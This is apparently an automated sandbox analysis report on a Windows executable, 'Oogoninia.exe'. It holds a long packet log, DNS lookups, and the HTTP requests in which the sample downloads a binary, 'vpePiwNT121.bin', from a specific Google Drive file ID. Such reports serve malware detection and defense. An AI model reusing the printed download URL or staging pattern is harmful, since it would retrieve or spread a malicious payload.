Oct 8, 2024 21:52:10.653362036 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.653511047 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.653546095 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.653846979 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.655774117 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.655926943 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.655955076 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.656363964 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.658648014 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.658786058 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.658808947 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.659003973 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.669776917 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.669926882 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.669996023 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.670001030 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.670042038 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.670161963 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.670166016 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.670331955 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.670331955 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.670356035 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.670521975 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.671130896 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.672528028 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.672815084 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.672846079 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.673032045 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.675364971 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.675592899 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.675672054 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.675955057 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.678066969 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.678297043 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.678354979 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.678594112 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.680629015 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.680846930 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.680890083 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.681083918 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.683288097 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.683635950 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.683695078 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.683932066 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.685854912 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.686093092 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.686156988 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.686419010 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.688993931 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.689157963 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.689209938 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.689496040 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.692240000 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.692420959 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.692475080 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.692734003 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.695463896 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.695741892 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.695802927 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.696088076 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.696238995 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.696445942 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.696508884 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.696747065 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.698693037 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.698987961 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.699043989 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.699379921 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.701129913 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.701291084 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.701344967 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.701625109 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.703794956 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.703988075 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.704025984 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.704211950 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.705981970 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.706705093 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.706732988 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.707048893 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.708170891 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.708348036 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.708388090 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.708626986 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.710603952 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.710813999 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.710850954 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.711071014 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.713212013 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.713373899 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.713403940 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.713591099 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.722466946 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.722632885 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.722637892 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.722676039 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.722851038 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.722898960 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.722913980 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.723189116 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.723932981 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.724190950 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.724231005 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.724380970 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.726232052 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.726458073 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.726496935 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.726703882 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.728811026 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.729721069 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.729749918 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.729975939 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.730319977 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.730468988 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.730494022 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.730808973 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.732470989 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.732635975 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.732664108 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.732953072 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.734030962 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.734242916 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.734271049 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.734443903 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.736007929 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.736236095 CEST  49706        443        192.168.11.20   142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736255884 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.736396074 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.737938881 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738169909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738193035 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.738425970 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.740803957 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741036892 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741072893 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.741303921 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747149944 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747332096 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747400045 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747419119 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747461081 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747570992 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747603893 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747741938 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747792006 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.747972965 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.748114109 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.752844095 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753009081 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753030062 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753086090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753232956 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753248930 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753400087 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753437996 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753463030 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753647089 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753695965 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753851891 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.753875971 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.754231930 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755419016 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755611897 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755649090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.755882025 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757006884 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757217884 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757253885 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.757558107 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759105921 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759311914 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759351015 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.759579897 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760185957 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760409117 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760445118 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.760759115 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.761851072 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762082100 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762118101 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.762347937 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763374090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763592958 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763629913 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.763843060 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.764919043 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765152931 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765188932 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.765419006 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766383886 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766616106 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766650915 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.766911030 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.767961025 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768151045 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768191099 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.768408060 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769427061 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769658089 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769694090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.769922972 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.773998976 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774202108 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774249077 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774271965 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774483919 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.774485111 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.783802032 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784013987 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784054041 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784096003 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784262896 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784322023 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784504890 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784518003 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784598112 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784703016 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784738064 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784811974 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784903049 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784915924 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.784955025 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094023 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094976 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785094976 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785157919 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785366058 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785382986 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785641909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.785641909 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:11.094909906 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:11.094980955 CEST44349706142.251.40.129192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 21:52:06.825788975 CEST | 61636 | 53 | 192.168.11.20 | 1.1.1.1
Oct 8, 2024 21:52:06.921607018 CEST | 53 | 61636 | 1.1.1.1 | 192.168.11.20
Oct 8, 2024 21:52:07.450614929 CEST | 52157 | 53 | 192.168.11.20 | 1.1.1.1
Oct 8, 2024 21:52:07.546505928 CEST | 53 | 52157 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 21:52:06.825788975 CEST | 192.168.11.20 | 1.1.1.1 | 0xc2c9 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 21:52:07.450614929 CEST | 192.168.11.20 | 1.1.1.1 | 0xbc75 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 21:52:06.921607018 CEST | 1.1.1.1 | 192.168.11.20 | 0xc2c9 | No error (0) | drive.google.com | (none) | 142.250.80.78 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 21:52:07.546505928 CEST | 1.1.1.1 | 192.168.11.20 | 0xbc75 | No error (0) | drive.usercontent.google.com | (none) | 142.251.40.129 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49705 | 142.250.80.78 | 443 | 9000 | C:\Users\user\Desktop\Oogoninia.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-08 19:52:07 UTC216OUTGET /uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2024-10-08 19:52:07 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Tue, 08 Oct 2024 19:52:07 GMT
                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: script-src 'nonce-__fYEZbpbPp0N46bfXnIGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49706 | 142.251.40.129 | 443 | 9000 | C:\Users\user\Desktop\Oogoninia.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 19:52:07 UTC | 258 | OUT | GET /download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-10-08 19:52:10 UTC | 4895 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="vpePiwNT121.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 288832
Last-Modified: Tue, 08 Oct 2024 07:01:06 GMT
X-GUploader-UploadID: AHmUCY0W7mnjixSXaJHun9aqQyakiYflmTHcZ5bv0xMoHozrfJGcMSwQjFJs97scslallb_3XnHBCfnHrQ
Date: Tue, 08 Oct 2024 19:52:10 GMT
Expires: Tue, 08 Oct 2024 19:52:10 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=xAUmxQ==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Target ID: 0
Start time: 15:51:40
Start date: 08/10/2024
Path: C:\Users\user\Desktop\Oogoninia.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Oogoninia.exe"
Imagebase: 0x400000
